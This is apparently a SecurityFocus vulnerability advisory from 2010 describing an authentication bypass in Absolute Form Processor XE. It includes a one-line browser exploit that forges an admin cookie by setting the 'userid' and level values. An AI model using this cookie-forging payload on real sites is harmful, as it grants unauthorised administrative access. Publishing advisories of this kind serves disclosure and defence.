Absolute Form Processor XE 'userid' Parameter Authentication Bypass Vulnerability

Attackers may exploit this issue through a browser.

The following example code is available:

javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";

The following exploit is also available:


 

Privacy Statement
Copyright 2010, SecurityFocus